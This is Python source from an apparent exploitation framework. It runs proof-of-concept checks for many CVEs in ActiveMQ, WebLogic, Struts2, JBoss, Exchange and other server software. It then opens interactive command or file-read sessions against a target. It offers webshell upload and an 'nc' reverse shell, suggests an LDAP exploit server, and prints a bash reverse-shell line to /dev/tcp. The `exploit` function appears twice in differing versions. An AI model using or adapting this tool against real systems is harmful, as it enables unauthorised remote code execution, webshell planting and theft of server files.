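def pt(self, target):
    """Run every bundled detection check (``*_poc``) against *target*, in order.

    One scanner object is built per product and its checks are called one
    after another; nothing is returned, so any reporting happens inside the
    individual check methods.

    The ActiveMQ pair used to be listed twice, so both checks were run twice
    against the same target; each check now runs once. The Fastjson scanner
    was also held in a variable named after Solr, which the table below
    avoids by not naming the instances at all.
    """
    # (scanner class, check methods in call order); order matches the
    # original straight-line sequence.
    checks = (
        (ApacheActiveMQ, ("cve_2015_5254_poc", "cve_2016_3088_poc")),
        (ApacheFlink, ("cve_2020_17518_poc", "cve_2020_17519_poc")),
        (ApacheShiro, ("cve_2016_4437_poc",)),
        (ApacheSolr, ("cve_2017_12629_poc", "cve_2019_0193_poc",
                      "cve_2019_17558_poc")),
        (ApacheTomcat, ("tomcat_examples_poc", "cve_2017_12615_poc",
                        "cve_2020_1938_poc")),
        (Fastjson, ("fastjson_1224_poc", "fastjson_1247_poc",
                    "fastjson_1262_poc")),
        (Spring, ("cve_2020_5410_poc", "cve_2019_3799_poc",
                  "cve_2018_1273_poc")),
        (Elasticsearch, ("cve_2015_1427_poc", "cve_2014_3120_poc")),
        (Jenkins, ("cve_2017_1000353_poc", "cve_2018_1000861_poc")),
        (OracleWeblogic, ("cve_2014_4210_poc", "cve_2020_14882_poc",
                          "cve_2017_3506_poc", "cve_2017_10271_poc",
                          "cve_2018_2894_poc", "cve_2019_2725_poc",
                          "cve_2020_2555_poc", "cve_2019_2729_poc",
                          "cve_2020_2883_poc", "cve_2020_2551_poc")),
        (Nexus, ("cve_2019_7238_poc", "cve_2020_10199_poc")),
        (RedHatJBoss, ("cve_2010_0738_poc", "cve_2010_1428_poc",
                       "cve_2015_7501_poc", "cve_2017_12149_poc")),
        (ApacheUnomi, ("cve_2020_13942_poc",)),
        (ThinkPHP, ("cve_2019_9082_poc", "cve_2018_20062_poc")),
        (Drupal, ("cve_2018_7600_poc", "cve_2018_7602_poc",
                  "cve_2019_6340_poc")),
        (ApacheStruts2, ("s2_005_poc", "s2_008_poc", "s2_009_poc",
                         "s2_013_poc", "s2_015_poc", "s2_016_poc",
                         "s2_029_poc", "s2_032_poc", "s2_045_poc",
                         "s2_046_poc", "s2_048_poc", "s2_052_poc",
                         "s2_057_poc", "s2_059_poc", "s2_061_poc",
                         "s2_devMode_poc")),
        (ApacheDruid, ("cve_2021_25646_poc",)),
        (Laravel, ("cve_2021_3129_poc",)),
        (Vmware, ("time_2020_1013_poc", "cve_2021_21972_poc")),
        (SaltStack, ("cve_2021_25282_poc",)),
        (NodeJs, ("cve_2021_21315_poc",)),
        (Exchange, ("cve_2021_26855_poc", "cve_2021_27065_poc")),
    )
    for scanner_cls, method_names in checks:
        scanner = scanner_cls(target)
        for method_name in method_names:
            # Looked up at call time so a missing check fails where it is
            # reached, not before the earlier ones have run.
            getattr(scanner, method_name)()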
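def exploit(target, vul_num):
    """Run the interactive session of one exploit module against *target*.

    *target* is normalised with ``url_check`` and must pass
    ``survival_check``; *vul_num* must be listed in ``explists``. Some
    modules first ask for extra parameters. After that, each line read at the
    prompt is passed to the module's ``*_exp`` method until ``exit``,
    ``quit`` or ``bye`` is entered. Every exit path ends the process with
    status 0; the function never returns normally.

    Fixes in this version:

    * identifiers are matched case-insensitively (a few were accepted in
      upper case only, and "CVE-2019-2729" was compared with itself twice);
    * prompts are built in one helper, so a Windows console always gets the
      colour-free variant and the webshell-name prompt no longer differs
      between platforms;
    * ``sys.exit`` replaces the site-provided ``exit``;
    * an identifier that passes the ``explists`` gate but has no handler is
      reported instead of prompting forever without doing anything;
    * placeholder defaults and an unused hint string were dropped.
    """
    target = url_check(target)
    if survival_check(target) == "f":
        print(now.timed(de=0) + color.red_warn()
              + color.red(" Survival check failed: " + target))
        sys.exit(0)
    delay = globals.get_value("DELAY")  # project-wide DELAY setting

    # One wrapper per product, all built up front in the original order.
    exp_apache_shiro = ApacheShiro(target)
    exp_apache_solr = ApacheSolr(target)
    exp_apache_tomcat = ApacheTomcat(target)
    exp_elasticsearch = Elasticsearch(target)
    exp_apache_flink = ApacheFlink(target)
    exp_jenkins = Jenkins(target)
    exp_spring = Spring(target)
    exp_nexus = Nexus(target)
    exp_oracle_weblogic = OracleWeblogic(target)
    exp_redhat_jboss = RedHatJBoss(target)
    exp_apache_unomi = ApacheUnomi(target)
    exp_thinkphp = ThinkPHP(target)
    exp_drupal = Drupal(target)
    exp_fastjson = Fastjson(target)
    exp_apache_struts2 = ApacheStruts2(target)
    exp_apache_druid = ApacheDruid(target)
    exp_laravel = Laravel(target)
    exp_vmware = Vmware(target)
    exp_saltstack = SaltStack(target)
    exp_exchange = Exchange(target)
    exp_big_ip = BIG_IP(target)
    exp_apache_ofbiz = ApacheOFBiz(target)

    print(now.timed(de=delay) + color.yel_info()
          + color.cyan(" Target url: " + target))
    print(now.timed(de=delay) + color.yel_info()
          + color.cyan(" Use exploit modules: " + vul_num))

    def hint(text, de=0):
        """Format an informational line; *de* is forwarded to now.timed."""
        return now.timed(de=de) + color.yel_info() + color.yellow(text)

    def ask(label):
        """Read one line; Windows gets the prompt without colour codes."""
        if os_check() == "windows":
            return input(now.no_color_timed(de=delay) + label)
        # "linux" and "other" shared the coloured prompt in the original.
        return input(now.timed(de=delay) + color.green(label))

    def session(label, run, notes=()):
        """Prompt in a loop and pass each answer to *run* until told to quit."""
        while True:
            answer = ask(label)
            if answer in ("exit", "quit", "bye"):
                sys.exit(0)
            for note in notes:
                # Callables are formatted now so their timestamp is current.
                print(note() if callable(note) else note)
            run(answer)

    # Static hints are formatted once, as before.
    nc = hint(" input \"nc\" bounce linux shell")
    up = hint(" input \"upload\" upload webshell")
    rmi_ldap = hint(" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
    bash_2 = hint(
        " nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\""
    )

    if vul_num not in explists:
        print(now.timed(de=0) + color.red_warn() + color.red(
            " The vulnerability does not support exploitation. Please refer to \"--list\""
        ))
        sys.exit(0)

    key = vul_num.lower()

    # Modules that take a file path: (wrapper, method name, example line).
    # Method names are resolved only for the selected module.
    file_modules = {
        "cve-2020-1938": (exp_apache_tomcat, "cve_2020_1938_exp",
                          " Examples: WEB-INF/web.xml"),
        "cve-2019-3799": (exp_spring, "cve_2019_3799_exp",
                          " Examples: /etc/passwd"),
        "cve-2020-5410": (exp_spring, "cve_2020_5410_exp",
                          " Examples: /etc/passwd"),
        "cve-2020-17519": (exp_apache_flink, "cve_2020_17519_exp",
                           " Examples: /etc/passwd"),
    }

    # Modules that take only a command: (wrapper, method name, hints printed
    # before each call).
    shell_modules = {
        "cve-2017-12615": (exp_apache_tomcat, "cve_2017_12615_exp", ()),
        "cve-2014-3120": (exp_elasticsearch, "cve_2014_3120_exp", ()),
        "cve-2015-1427": (exp_elasticsearch, "cve_2015_1427_exp", ()),
        "cve-2018-1000861": (exp_jenkins, "cve_2018_1000861_exp", ()),
        "cve-2017-3506": (exp_oracle_weblogic, "cve_2017_3506_exp", ()),
        "cve-2017-10271": (exp_oracle_weblogic, "cve_2017_10271_exp", (nc, up)),
        "cve-2018-2894": (exp_oracle_weblogic, "cve_2018_2894_exp", ()),
        "cve-2019-2725": (exp_oracle_weblogic, "cve_2019_2725_exp", (nc, up)),
        "cve-2019-2729": (exp_oracle_weblogic, "cve_2019_2729_exp", (nc,)),
        "cve-2020-2555": (exp_oracle_weblogic, "cve_2020_2555_exp", ()),
        "cve-2020-2883": (exp_oracle_weblogic, "cve_2020_2883_exp", ()),
        "cve-2020-14882": (exp_oracle_weblogic, "cve_2020_14882_exp", ()),
        "cve-2017-12629": (exp_apache_solr, "cve_2017_12629_exp", ()),
        "cve-2019-17558": (exp_apache_solr, "cve_2019_17558_exp", ()),
        "cve-2019-7238": (exp_nexus, "cve_2019_7238_exp", ()),
        "cve-2010-0738": (exp_redhat_jboss, "cve_2010_0738_exp", ()),
        "cve-2010-1428": (exp_redhat_jboss, "cve_2010_1428_exp", ()),
        "cve-2015-7501": (exp_redhat_jboss, "cve_2015_7501_exp", ()),
        "cve-2020-13942": (exp_apache_unomi, "cve_2020_13942_exp", ()),
        "cve-2019-9082": (exp_thinkphp, "cve_2019_9082_exp", (up,)),
        "cve-2018-20062": (exp_thinkphp, "cve_2018_20062_exp", ()),
        "cve-2018-7600": (exp_drupal, "cve_2018_7600_exp", ()),
        "cve-2018-7602": (exp_drupal, "cve_2018_7602_exp", ()),
        "cve-2019-6340": (exp_drupal, "cve_2019_6340_exp", ()),
        "s2-devmode": (exp_apache_struts2, "s2_devMode_exp", ()),
        "1.2.24": (exp_fastjson, "fastjson_1224_exp", (rmi_ldap,)),
        "1.2.47": (exp_fastjson, "fastjson_1247_exp", (rmi_ldap,)),
        "1.2.62": (exp_fastjson, "fastjson_1262_exp", (rmi_ldap,)),
        "cve-2021-25646": (exp_apache_druid, "cve_2021_25646_exp", (bash_2,)),
        "cve-2021-22986": (exp_big_ip, "cve_2021_22986_exp", ()),
        "cve-2020-5902": (
            exp_big_ip, "cve_2020_5902_exp",
            (lambda: hint(" Examples: /etc/passwd", delay),)),
        "cve-2021-26295": (
            exp_apache_ofbiz, "cve_2021_26295_exp",
            (lambda: hint(
                " java encode: http://www.jackson-t.ca/runtime-exec-payloads.html",
                delay),)),
    }
    for bulletin in ("005", "008", "009", "013", "015", "016", "029", "032",
                     "045", "046", "048", "052", "057", "059", "061"):
        shell_modules["s2-" + bulletin] = (
            exp_apache_struts2, "s2_" + bulletin + "_exp", ())

    if key in file_modules:
        owner, method_name, example = file_modules[key]
        print(hint(example, delay))
        session("[+] File >>> ", getattr(owner, method_name))
    elif key == "cve-2016-4437":
        shiro_key = ask("[+] key: ")
        shiro_gadget = ask("[+] gadget: ")
        session("[+] Shell >>> ",
                lambda cmd: exp_apache_shiro.cve_2016_4437_exp(
                    cmd, shiro_key, shiro_gadget))
    elif key == "cve-2020-10199":
        # NOTE(review): both credential prompts are masked ("******") in the
        # copy under review; they are reconstructed here from the surviving
        # labels and the nexus_u / nexus_p names. Confirm against the
        # project file.
        # NOTE(review): input() echoes the password to the terminal;
        # getpass.getpass would avoid that where stdin is never piped.
        nexus_u = ask("[+] Input username: ")
        nexus_p = ask("[+] Input password: ")
        session("[+] Shell >>> ",
                lambda cmd: exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p))
    elif key == "cve-2018-15133":
        laravel_key = ask("[+] Input APP_KEY: ")
        laravel_gadget = ask(
            "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")
        session("[+] Shell >>> ",
                lambda cmd: exp_laravel.cve_2018_15133_exp(
                    cmd, laravel_key, laravel_gadget))
    elif key == "cve-2021-21972":
        os_type = ask("[+] The target os type (linux/windows): ")
        session("[+] Shell >>> ",
                lambda cmd: exp_vmware.cve_2021_21972_exp(cmd, os_type))
    elif key == "cve-2021-25282":
        file = ask("[+] upload file: ")
        path = ask("[+] upload path (e.g. /tmp/test.txt): ")
        session("[+] Shell >>> ",
                lambda cmd: exp_saltstack.cve_2021_25282_exp(cmd, file, path))
    elif key == "cve-2021-27065":
        email = ask("[+] email: ")
        file = ask("[+] webshell name (e.g. shell.aspx): ")
        session("[+] Shell >>> ",
                lambda cmd: exp_exchange.cve_2021_27065_exp(cmd, file, email))
    elif key in shell_modules:
        # Command-execution modules that need no extra parameters.
        owner, method_name, notes = shell_modules[key]
        session("[+] Shell >>> ", getattr(owner, method_name), notes)
    else:
        # Listed in explists but not wired to a handler in this function.
        print(now.timed(de=0) + color.red_warn() + color.red(
            " The vulnerability does not support exploitation. Please refer to \"--list\""
        ))
        sys.exit(0)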
def apache_tomcat(self, target, gevent_pool):
    """Queue the three Tomcat detection checks for *target*.

    Each check is handed to ``spawn`` and the value it returns is appended to
    *gevent_pool*, which is modified in place. Nothing is returned.
    """
    scanner = ApacheTomcat(target)
    for check_name in ("tomcat_examples_poc",
                       "cve_2017_12615_poc",
                       "cve_2020_1938_poc"):
        # Resolve and spawn one check at a time, in the original order.
        job = spawn(getattr(scanner, check_name))
        gevent_pool.append(job)
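def exploit(target, vul_num):
    """Run the interactive session of one exploit module against *target*.

    *target* is normalised with ``url_check`` and must pass
    ``survival_check``; *vul_num* must be listed in ``explists``. Some
    modules first ask for extra parameters. After that, each line read at the
    prompt is passed to the module's ``*_exp`` method until ``exit``,
    ``quit`` or ``bye`` is entered. Every exit path ends the process with
    status 0; the function never returns normally.

    Fixes in this version:

    * identifiers are matched case-insensitively ("CVE-2019-2729" was
      compared with itself twice, so its lower-case form never matched);
    * prompts are built in one helper instead of being repeated per branch;
    * ``sys.exit`` replaces the site-provided ``exit``;
    * an identifier that passes the ``explists`` gate but has no handler is
      reported instead of prompting forever without doing anything;
    * placeholder defaults and an unused hint string were dropped.
    """
    target = url_check(target)
    if survival_check(target) == "f":
        print(now.timed(de=0) + color.red_warn()
              + color.red(" Survival check failed: " + target))
        sys.exit(0)
    delay = globals.get_value("DELAY")  # project-wide DELAY setting

    # One wrapper per product, all built up front in the original order.
    exp_apache_shiro = ApacheShiro(target)
    exp_apache_solr = ApacheSolr(target)
    exp_apache_tomcat = ApacheTomcat(target)
    exp_elasticsearch = Elasticsearch(target)
    exp_apache_flink = ApacheFlink(target)
    exp_jenkins = Jenkins(target)
    exp_spring = Spring(target)
    exp_nexus = Nexus(target)
    exp_oracle_weblogic = OracleWeblogic(target)
    exp_redhat_jboss = RedHatJBoss(target)
    exp_apache_unomi = ApacheUnomi(target)
    exp_thinkphp = ThinkPHP(target)
    exp_drupal = Drupal(target)
    exp_fastjson = Fastjson(target)
    exp_apache_struts2 = ApacheStruts2(target)

    print(now.timed(de=delay) + color.yel_info()
          + color.cyan(" Target url: " + target))
    print(now.timed(de=delay) + color.yel_info()
          + color.cyan(" Use exploit modules: " + vul_num))

    def hint(text, de=0):
        """Format an informational line; *de* is forwarded to now.timed."""
        return now.timed(de=de) + color.yel_info() + color.yellow(text)

    def ask(label):
        """Read one line; Windows gets the prompt without colour codes."""
        if os_check() == "windows":
            return input(now.no_color_timed(de=delay) + label)
        # "linux" and "other" shared the coloured prompt in the original.
        return input(now.timed(de=delay) + color.green(label))

    def session(label, run, notes=()):
        """Prompt in a loop and pass each answer to *run* until told to quit."""
        while True:
            answer = ask(label)
            if answer in ("exit", "quit", "bye"):
                sys.exit(0)
            for note in notes:
                print(note)
            run(answer)

    # Static hints are formatted once, as before.
    nc = hint(" input \"nc\" bounce linux shell")
    up = hint(" input \"upload\" upload webshell")
    rmi_ldap = hint(" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")

    if vul_num not in explists:
        print(now.timed(de=0) + color.red_warn() + color.red(
            " The vulnerability does not support exploitation. Please refer to \"--list\""
        ))
        sys.exit(0)

    key = vul_num.lower()

    # Modules that take a file path: (wrapper, method name, example line).
    # Method names are resolved only for the selected module.
    file_modules = {
        "cve-2020-1938": (exp_apache_tomcat, "cve_2020_1938_exp",
                          " Examples: WEB-INF/web.xml"),
        "cve-2019-3799": (exp_spring, "cve_2019_3799_exp",
                          " Examples: /etc/passwd"),
        "cve-2020-5410": (exp_spring, "cve_2020_5410_exp",
                          " Examples: /etc/passwd"),
        "cve-2020-17519": (exp_apache_flink, "cve_2020_17519_exp",
                           " Examples: /etc/passwd"),
    }

    # Modules that take only a command: (wrapper, method name, hints printed
    # before each call).
    shell_modules = {
        "cve-2017-12615": (exp_apache_tomcat, "cve_2017_12615_exp", ()),
        "cve-2014-3120": (exp_elasticsearch, "cve_2014_3120_exp", ()),
        "cve-2015-1427": (exp_elasticsearch, "cve_2015_1427_exp", ()),
        "cve-2018-1000861": (exp_jenkins, "cve_2018_1000861_exp", ()),
        "cve-2017-3506": (exp_oracle_weblogic, "cve_2017_3506_exp", ()),
        "cve-2017-10271": (exp_oracle_weblogic, "cve_2017_10271_exp", (nc, up)),
        "cve-2018-2894": (exp_oracle_weblogic, "cve_2018_2894_exp", ()),
        "cve-2019-2725": (exp_oracle_weblogic, "cve_2019_2725_exp", (nc, up)),
        "cve-2019-2729": (exp_oracle_weblogic, "cve_2019_2729_exp", (nc,)),
        "cve-2020-2555": (exp_oracle_weblogic, "cve_2020_2555_exp", ()),
        "cve-2020-2883": (exp_oracle_weblogic, "cve_2020_2883_exp", ()),
        "cve-2020-14882": (exp_oracle_weblogic, "cve_2020_14882_exp", ()),
        "cve-2017-12629": (exp_apache_solr, "cve_2017_12629_exp", ()),
        "cve-2019-17558": (exp_apache_solr, "cve_2019_17558_exp", ()),
        "cve-2019-7238": (exp_nexus, "cve_2019_7238_exp", ()),
        "cve-2010-0738": (exp_redhat_jboss, "cve_2010_0738_exp", ()),
        "cve-2010-1428": (exp_redhat_jboss, "cve_2010_1428_exp", ()),
        "cve-2015-7501": (exp_redhat_jboss, "cve_2015_7501_exp", ()),
        "cve-2020-13942": (exp_apache_unomi, "cve_2020_13942_exp", ()),
        "cve-2019-9082": (exp_thinkphp, "cve_2019_9082_exp", (up,)),
        "cve-2018-20062": (exp_thinkphp, "cve_2018_20062_exp", ()),
        "cve-2018-7600": (exp_drupal, "cve_2018_7600_exp", ()),
        "cve-2018-7602": (exp_drupal, "cve_2018_7602_exp", ()),
        "cve-2019-6340": (exp_drupal, "cve_2019_6340_exp", ()),
        "s2-devmode": (exp_apache_struts2, "s2_devMode_exp", ()),
        "1.2.24": (exp_fastjson, "fastjson_1224_exp", (rmi_ldap,)),
        "1.2.47": (exp_fastjson, "fastjson_1247_exp", (rmi_ldap,)),
        "1.2.62": (exp_fastjson, "fastjson_1262_exp", (rmi_ldap,)),
    }
    for bulletin in ("005", "008", "009", "013", "015", "016", "029", "032",
                     "045", "046", "048", "052", "057", "059", "061"):
        shell_modules["s2-" + bulletin] = (
            exp_apache_struts2, "s2_" + bulletin + "_exp", ())

    if key in file_modules:
        owner, method_name, example = file_modules[key]
        print(hint(example, delay))
        session("[+] File >>> ", getattr(owner, method_name))
    elif key == "cve-2016-4437":
        shiro_key = ask("[+] key: ")
        shiro_gadget = ask("[+] gadget: ")
        session("[+] Shell >>> ",
                lambda cmd: exp_apache_shiro.cve_2016_4437_exp(
                    cmd, shiro_key, shiro_gadget))
    elif key == "cve-2020-10199":
        # NOTE(review): both credential prompts are masked ("******") in the
        # copy under review; they are reconstructed here from the surviving
        # labels and the nexus_u / nexus_p names. Confirm against the
        # project file.
        # NOTE(review): input() echoes the password to the terminal;
        # getpass.getpass would avoid that where stdin is never piped.
        nexus_u = ask("[+] Input username: ")
        nexus_p = ask("[+] Input password: ")
        session("[+] Shell >>> ",
                lambda cmd: exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p))
    elif key in shell_modules:
        # Command-execution modules that need no extra parameters.
        owner, method_name, notes = shell_modules[key]
        session("[+] Shell >>> ", getattr(owner, method_name), notes)
    else:
        # Listed in explists but not wired to a handler in this function.
        print(now.timed(de=0) + color.red_warn() + color.red(
            " The vulnerability does not support exploitation. Please refer to \"--list\""
        ))
        sys.exit(0)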